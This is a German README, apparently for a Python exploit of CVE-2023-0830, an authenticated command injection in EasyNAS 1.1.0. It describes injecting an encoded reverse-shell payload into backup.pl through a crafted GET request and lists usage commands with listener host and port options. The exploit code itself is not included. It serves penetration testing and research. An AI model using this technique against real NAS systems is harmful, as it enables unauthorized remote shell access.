
Exploit für EasyNAS Version 1.1.0. Die ausgenutzte Schwachstelle ist eine Befehlseinschleusungslücke, die eine Authentifizierung erfordert.
Dieses Python-Skript ist ein leistungsstarker Exploit für EasyNAS Version 1.1.0 mit erweiterter Funktionalität, einschließlich eines integrierten Listeners. Die ausgenutzte Schwachstelle ist ein Befehlseinschleusungsfehler, der eine Authentifizierung erfordert.
Das Skript stellt eine Sitzung mit dem Zielserver her und sendet dann eine Anmeldeanforderung mit vom Benutzer bereitgestellten Anmeldeinformationen. Nach erfolgreicher Authentifizierung erstellt das Skript eine Nutzlast, die bei Ausführung eine Reverse-Shell-Verbindung zu einer vom Benutzer angegebenen IP und einem Port öffnet. Diese Nutzlast wird URL- und Base64-kodiert und dann über eine präparierte GET-Anfrage in die Datei backup.pl auf dem Server injiziert.
Ivan Spiridonov (xbz0n) https://xbz0n.sh
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin --mode reverse --lhost 192.168.0.100 --lport 4444
--mode {shell,reverse} Exploit-Modus: shell (integrierte Reverse-Shell) oder reverse (externer Listener)
--lhost IP_ADDRESS IP-Adresse für den Reverse-Shell-Listener (standardmäßig automatisch erkannt)
--lport PORT Port für den Reverse-Shell-Listener (Standard: 4444)
--protocol {http,https} Zu verwendendes Protokoll (Standard: https)
--verbose Ausführliche Ausgabe aktivieren
--shell {bash,sh,python} Shell-Typ für integrierten Listener angeben (Standard: bash)
Dieses Skript dient nur zu Bildungszwecken und für autorisierte Penetrationstests. Holen Sie immer die ausdrückliche Erlaubnis ein, bevor Sie Penetrationstests gegen ein Netzwerk oder System durchführen.
Bitte verwenden Sie es verantwortungsvoll.